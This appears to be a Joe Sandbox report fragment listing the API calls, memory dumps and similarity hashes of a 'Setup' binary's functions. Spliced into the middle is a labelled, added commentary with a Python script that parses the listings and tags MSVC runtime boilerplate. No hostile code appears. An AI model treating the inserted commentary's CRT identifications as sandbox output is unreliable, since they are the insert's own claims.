• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 94a0be78148ecfc06285739001447e821eba0fa8c37fdc2c8c745ca364d63c22
• Instruction ID: 76c88bd26754f755a004f421f1989a2e4dfe58ead8cbcf6de061d2537413836f
• Opcode Fuzzy Hash: 94a0be78148ecfc06285739001447e821eba0fa8c37fdc2c8c745ca364d63c22
• Instruction Fuzzy Hash: 0DD012F2805360BFB7309F711C48CB32EADE955171355496BB852D7501C660CC49C3E0
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 698DFF21
  • Part of subcall function 698E007B: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 698E00A9
  • Part of subcall function 698E007B: SetWindowPos.USER32(0000000C,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 698E00E6
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Window$ChildEnumWindows
• String ID:
• API String ID: 1604351572-0
• Opcode ID: 914d8ec8749d0a5722351308249e8966af8de6e56e6b01faa5e37af76ca63386
• Instruction ID: 28d0fc59909df0143327bcffc0cdd782aafbc8518128db3caa972a8e3777649e
• Opcode Fuzzy Hash: 914d8ec8749d0a5722351308249e8966af8de6e56e6b01faa5e37af76ca63386
• Instruction Fuzzy Hash: 8BC08C3B0260307686307B78A808C9F299A9EA32A83090809F40082010CE114C46E6E0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000172,00000000,?), ref: 69DABC5A
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 9d279bf47cea6916146d09ec1d8ab9d4d6dd794e3d42b90855171a87fbd2bf74
• Instruction ID: 1451ce33d5938d31385032e1dd65137cf25e69f90c9a379a7ebf0e9a3f977cca
• Opcode Fuzzy Hash: 9d279bf47cea6916146d09ec1d8ab9d4d6dd794e3d42b90855171a87fbd2bf74
• Instruction Fuzzy Hash: 09C01231240204BBD7110E95CC05F817FA5E755750F104025F74886150C57198109744
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,69D7B029,?,0000002C,69DBD55B,?,?,?,?,00000001), ref: 69DA91C5
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: e10c25006553781f9851401d817bf4c59dc712229c824e469cd8277d2585e57d
• Instruction ID: 77c32c8e587e9cd91dc981b1819898b38b598cde0402c34a21586ddf0bdfcf0b
• Opcode Fuzzy Hash: e10c25006553781f9851401d817bf4c59dc712229c824e469cd8277d2585e57d
• Instruction Fuzzy Hash: B8C08CB2080218BBDB100E818C05FA9BA2887D6720FA18022B3881449249B194109A69
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 69DD5505
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: ce5c4d0741e86558ca208926775dd30911e085fa1f58ac278b46c87970e4c97e
• Instruction ID: f05d1605eea53d6fc93d50749371a706aca38ecb16c919bbf9b0a3ac9b6a6c70
• Opcode Fuzzy Hash: ce5c4d0741e86558ca208926775dd30911e085fa1f58ac278b46c87970e4c97e
• Instruction Fuzzy Hash: 12C01232080208FBEB124E80C809B9A7E6AEBA1350F24C020B618088A08772D5A1DB84
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(?,00000000,?), ref: 69901C63
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: a325012290a0d2a326dcd18e9c116648a153089e4271924d0e7f68c71c43f06a
• Instruction ID: 8a2f9868728f680d6390c7a87c62fcedab7b1d2e09277a645bf06d67910e0e25
• Opcode Fuzzy Hash: a325012290a0d2a326dcd18e9c116648a153089e4271924d0e7f68c71c43f06a
• Instruction Fuzzy Hash: EAC09B36040148B7CF111A81DC05F55BF6AEB95750F148011F60805051C773D421D6D8
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(?,00000000,?), ref: 69DD54E3
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 51780a6dc5e66fe78de21196b60bcdb7d5b1203e8b24dd67d9ed493d7d4e5a7e
• Instruction ID: 50f3eb298948715bc7fe1f046f65543b60755c426003292239cd3dceed36a7ea
• Opcode Fuzzy Hash: 51780a6dc5e66fe78de21196b60bcdb7d5b1203e8b24dd67d9ed493d7d4e5a7e
• Instruction Fuzzy Hash: 95C09B36040148F7DB111E81DC05F45BF99D795751F14C061F608054628773D421D794
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,69DAA320,F0D05EFD,?,?), ref: 69D7C55E
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: f7a79d130b4229416044c1bee7a6f1fdeba178338f845159911ef5b9e52ef48f
• Instruction ID: 82a026de308a01724d481b59edecadc0e81bac646db805e9c1f6e466fed1979c
• Opcode Fuzzy Hash: f7a79d130b4229416044c1bee7a6f1fdeba178338f845159911ef5b9e52ef48f
• Instruction Fuzzy Hash: C0115272645701EFEB34CF35D916B2677E4AB00714F10893EE246DE6D0DB7AE5408B54
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32 ref: 009A40FF
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A4114
• UnhandledExceptionFilter.KERNEL32(009A1C60), ref: 009A411F
• GetCurrentProcess.KERNEL32(C0000409), ref: 009A413B
• TerminateProcess.KERNEL32(00000000), ref: 009A4142
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: e426aa4d0af1b79dfe109d17683a659f34065d19c05389d4fe5fcaef14dba431
• Instruction ID: 394a72a876b9b18ac33da8537764e2b9c95912ba2c60402dcf6dfed863af957a
• Opcode Fuzzy Hash: e426aa4d0af1b79dfe109d17683a659f34065d19c05389d4fe5fcaef14dba431
• Instruction Fuzzy Hash: CB21CFB482D2249FCB40DF29E9896953BF4BF0E315F10401AE50A8B7B1E7B55886EFD4
Uniqueness
Uniqueness Score: -1.00%


                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,009A2AAE), ref: 009A3C0B
                                                                                                                                                                    • __mtterm.LIBCMT ref: 009A3C17
                                                                                                                                                                      • Part of subcall function 009A3937: _DecodePointerInternal@4.SETUP(00000006,009A3D79,?,009A2AAE), ref: 009A3948
                                                                                                                                                                      • Part of subcall function 009A3937: TlsFree.KERNEL32(0000001D,009A3D79,?,009A2AAE), ref: 009A3962
                                                                                                                                                                      • Part of subcall function 009A3937: DeleteCriticalSection.KERNEL32(00000000,00000000,009A2976,?,009A3D79,?,009A2AAE), ref: 009A420F
                                                                                                                                                                      • Part of subcall function 009A3937: _free.LIBCMT ref: 009A4212
                                                                                                                                                                      • Part of subcall function 009A3937: DeleteCriticalSection.KERNEL32(0000001D,009A2976,?,009A3D79,?,009A2AAE), ref: 009A4239
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A3C2D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A3C3A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A3C47
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A3C54
                                                                                                                                                                    • TlsAlloc.KERNEL32(?,009A2AAE), ref: 009A3CA4
                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,009A2AAE), ref: 009A3CBF
                                                                                                                                                                    • __init_pointers.LIBCMT ref: 009A3CC9
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CDA
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CE7
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CF4
                                                                                                                                                                    • _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3D01
                                                                                                                                                                    • _DecodePointerInternal@4.SETUP(009A3ACF,?,009A2AAE), ref: 009A3D22
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 009A3D37
                                                                                                                                                                    • _DecodePointerInternal@4.SETUP(00000000,?,009A2AAE), ref: 009A3D51
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009A3D63
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internal@4Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                    • API String ID: 1131704290-3819984048
                                                                                                                                                                    • Opcode ID: 6e9a69e4aad97f6111d03d43bfde8a3ac697f7ce3cb140dba4d57aec56c4a10f
                                                                                                                                                                    • Instruction ID: 8d36981fa3ba37b220e635e4b12840122de77bf711d9018c877bdcd687315ed5
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9a69e4aad97f6111d03d43bfde8a3ac697f7ce3cb140dba4d57aec56c4a10f
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F316B31968320AEDF11AF79AC1A75A7EB8BF87764B00451AF448922F0DF758540EFD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
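The two function listings immediately above (the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess block, and the GetProcAddress(FlsAlloc, FlsGetValue, FlsSetValue, FlsFree) / TlsAlloc / TlsSetValue block) are the shape of two statically linked MSVC C runtime routines: the /GS stack-cookie failure handler (`__report_gsfailure` / `__raise_securityfailure`, whose giveaway is the status code C0000409, STATUS_STACK_BUFFER_OVERRUN, sitting in the TerminateProcess argument slot) and the CRT's multithread initialisation (`__mtinit`). Neither is sample logic, and the IsDebuggerPresent call in the first is CRT crash-reporting behaviour rather than an anti-debug check. The following is an added triage helper, not part of the Joe Sandbox report or the sample: it parses bullet lines from an "APIs" block into structured calls, tags those two CRT patterns so an analyst can skip them while walking the function list, and leaves everything else unclassified. The CRT routine names used as tags are this example's own identification of the patterns, not labels the report assigns; the sample blocks are copied from the listings above and trimmed.

```python
"""Triage helper for Joe Sandbox "APIs" function listings (added example,
not part of the report). Parses the bullet lines of an APIs block and tags
two well-known MSVC CRT routines so they can be skipped during review."""
import re
from collections import Counter
from typing import NamedTuple


class ApiCall(NamedTuple):
    api: str       # e.g. "GetProcAddress"
    module: str    # e.g. "KERNEL32", "NTDLL", "LIBCMT", "SETUP"
    args: tuple    # argument tokens as printed by the report ("?" = unknown)
    ref: int       # call-site address
    subcall: bool  # True for "Part of subcall function ..." lines


# One "• Api.MODULE(args), ref: ADDR" bullet, optionally prefixed with the
# "Part of subcall function XXXX:" marker the report uses for callee calls.
_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_block(text: str) -> list:
    """Return the ApiCall entries in a block; headings and other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["module"], args,
                             int(m["ref"], 16), m["sub"] is not None))
    return calls


# MSVC CRT /GS failure path: IsDebuggerPresent, clear the unhandled-exception
# filter, hand the fault to UnhandledExceptionFilter, then TerminateProcess
# with STATUS_STACK_BUFFER_OVERRUN (0xC0000409).
GS_FAILURE_APIS = {"IsDebuggerPresent", "SetUnhandledExceptionFilter",
                   "UnhandledExceptionFilter", "GetCurrentProcess",
                   "TerminateProcess"}
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409

# MSVC CRT __mtinit: resolves the Fls* family from KERNEL32.DLL by name
# (GetProcAddress) and sets up TLS with TlsAlloc/TlsSetValue.
FLS_IMPORTS = {"FlsAlloc", "FlsGetValue", "FlsSetValue", "FlsFree"}


def classify(calls: list) -> str:
    """Tag a function's direct calls as known CRT boilerplate, else 'unclassified'."""
    direct = [c for c in calls if not c.subcall]
    names = {c.api for c in direct}
    all_args = {a for c in direct for a in c.args}
    if GS_FAILURE_APIS <= names:
        seen = f"{STATUS_STACK_BUFFER_OVERRUN:08X}" in all_args
        return "crt:__raise_securityfailure" + (" [STATUS_STACK_BUFFER_OVERRUN]" if seen else "")
    resolved = {a for c in direct if c.api == "GetProcAddress" for a in c.args}
    if FLS_IMPORTS <= resolved and {"TlsAlloc", "TlsSetValue"} <= names:
        return "crt:__mtinit"
    return "unclassified"


def module_histogram(calls: list) -> Counter:
    """Count direct calls per imported module (subcall lines excluded)."""
    return Counter(c.module for c in calls if not c.subcall)


# Sample blocks copied from the report listings above (constructed test input,
# the __mtinit block trimmed to the lines the classifier needs).
SAMPLE_GS = """\
• IsDebuggerPresent.KERNEL32 ref: 009A40FF
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A4114
• UnhandledExceptionFilter.KERNEL32(009A1C60), ref: 009A411F
• GetCurrentProcess.KERNEL32(C0000409), ref: 009A413B
• TerminateProcess.KERNEL32(00000000), ref: 009A4142
"""

SAMPLE_MTINIT = """\
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,009A2AAE), ref: 009A3C0B
• __mtterm.LIBCMT ref: 009A3C17
  • Part of subcall function 009A3937: TlsFree.KERNEL32(0000001D,009A3D79,?,009A2AAE), ref: 009A3962
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A3C2D
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A3C3A
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A3C47
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A3C54
• TlsAlloc.KERNEL32(?,009A2AAE), ref: 009A3CA4
• TlsSetValue.KERNEL32(00000000,?,009A2AAE), ref: 009A3CBF
• _EncodePointerInternal@4.SETUP(?,009A2AAE), ref: 009A3CDA
• GetCurrentThreadId.KERNEL32 ref: 009A3D63
"""

SAMPLE_HEAP = "• RtlAllocateHeap.NTDLL(?,00000000,?), ref: 69DD54E3\n"

if __name__ == "__main__":
    for name, block in (("gs", SAMPLE_GS), ("mtinit", SAMPLE_MTINIT), ("heap", SAMPLE_HEAP)):
        calls = parse_api_block(block)
        print(f"{name}: {len(calls)} calls, {classify(calls)}, {dict(module_histogram(calls))}")
```

Subcall lines are parsed but excluded from classification on purpose: the report attributes them to the callee (009A3937 here), so counting them against the caller would make unrelated functions look alike. Anything the classifier leaves unclassified still needs a human look; the tags only remove known CRT noise.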

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 698DE179
                                                                                                                                                                    • GetParent.USER32 ref: 698DE18B
                                                                                                                                                                    • GetWindow.USER32(?,00000004), ref: 698DE197
                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 698DE1A5
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 698DE1BB
                                                                                                                                                                    • MonitorFromWindow.USER32(?,00000002), ref: 698DE1DA
                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 698DE1F7
                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 698DE220
                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000000,?,00000002,?,?,?,?,?), ref: 698DE2C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$LongMonitorRect$FromInfoParent
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 1468510684-3887548279
                                                                                                                                                                    • Opcode ID: 196279d7f32722ff95baf9f5dbad6a91748aeeb0025435d502d483f421e8d56d
                                                                                                                                                                    • Instruction ID: 7dd478fc963e87ef665d87a1c61cd8dafcc054a45e4fc870248ae57a4d5b2f57
                                                                                                                                                                    • Opcode Fuzzy Hash: 196279d7f32722ff95baf9f5dbad6a91748aeeb0025435d502d483f421e8d56d
                                                                                                                                                                    • Instruction Fuzzy Hash: E8518E71A002099FDF04CEA8CD88AAEBBB9BF4A355F140528F911F7295D770AD08CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 698F09E7
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698F0A02
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
• MapDialogRect.USER32(?,00000000), ref: 698F0AEE
• ShowWindow.USER32(00000000,00000001,00000000,?,?,?,40000000,?,?,00000000), ref: 698F0B68
• SendMessageW.USER32(00000000,00000030,?,00000001), ref: 698F0B78
  • Part of subcall function 698DF589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698DF5AC
  • Part of subcall function 698DF589: GetObjectW.GDI32(00000000,0000005C,?), ref: 698DF5B5
  • Part of subcall function 698DF589: CreateFontIndirectW.GDI32(?), ref: 698DF600
  • Part of subcall function 698DF589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 698DF610
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 698F0C2A
• SendMessageW.USER32(00000000,00000170,?,00000000), ref: 698F0C70
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 698F0CA3
  • Part of subcall function 698EF933: SendMessageW.USER32(?,00000172,00000000,?), ref: 698EF944
• MapDialogRect.USER32(?,00000000), ref: 698F0DAB
• SendMessageW.USER32(?,00000030,?,00000001), ref: 698F0E0A
• ShowWindow.USER32(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,6990677E,000000FF), ref: 698F0E15
  • Part of subcall function 698EF8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 698EF91E
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3H_prolog3_IndirectObject
• String ID:
• API String ID: 2777900791-0
• Opcode ID: 65c3cb44529aa373712f4ace1602c591bd36cddc24ab783db305b468c283322d
• Instruction ID: c82beea17d176747e8ad660d31df0157bcdb68866c450a42e1b8a5187214a5f8
• Opcode Fuzzy Hash: 65c3cb44529aa373712f4ace1602c591bd36cddc24ab783db305b468c283322d
• Instruction Fuzzy Hash: 6402F275A00208AFCF04DFA8C998A9DBBF6FF8D311F148499E506AB361DB35A945CF50
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698E7962
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
• EnumWindows.USER32(698E7C3F,?), ref: 698E79BF
  • Part of subcall function 698E7BC5: _calloc.LIBCMT ref: 698E7BE6
  • Part of subcall function 698E7AC7: __EH_prolog3.LIBCMT ref: 698E7ACE
• RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 698E7ABB
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$EnumExceptionRaiseWindows_calloc
• String ID: complete$Action$Blocking Processes$Enumerating incompatible processes$No Blocking Processes$[ProcessID] [ImageName] [WindowTitle] [WindowVisible]
• API String ID: 3326300193-1989790735
• Opcode ID: 0fa0682eaf52c6344b6b4a890229e97145a37b15f9792a70c5f65dd60543da3f
• Instruction ID: 53df6bdf36519889d43e43116875d5b57ca034c42c2e0a0ef52598238f2c3815
• Opcode Fuzzy Hash: 0fa0682eaf52c6344b6b4a890229e97145a37b15f9792a70c5f65dd60543da3f
• Instruction Fuzzy Hash: 1241BE75A00249EFDB00DFA8C848F9DBBF5BF55318F54884DE504EB292CB709A4ACB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698F215F
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
• MapDialogRect.USER32(?,00000000), ref: 698F2267
• ShowWindow.USER32(?,00000001,?,?,?,?,40000000,?,?,00000000), ref: 698F22ED
• SendMessageW.USER32(?,00000030,?,00000001), ref: 698F22FF
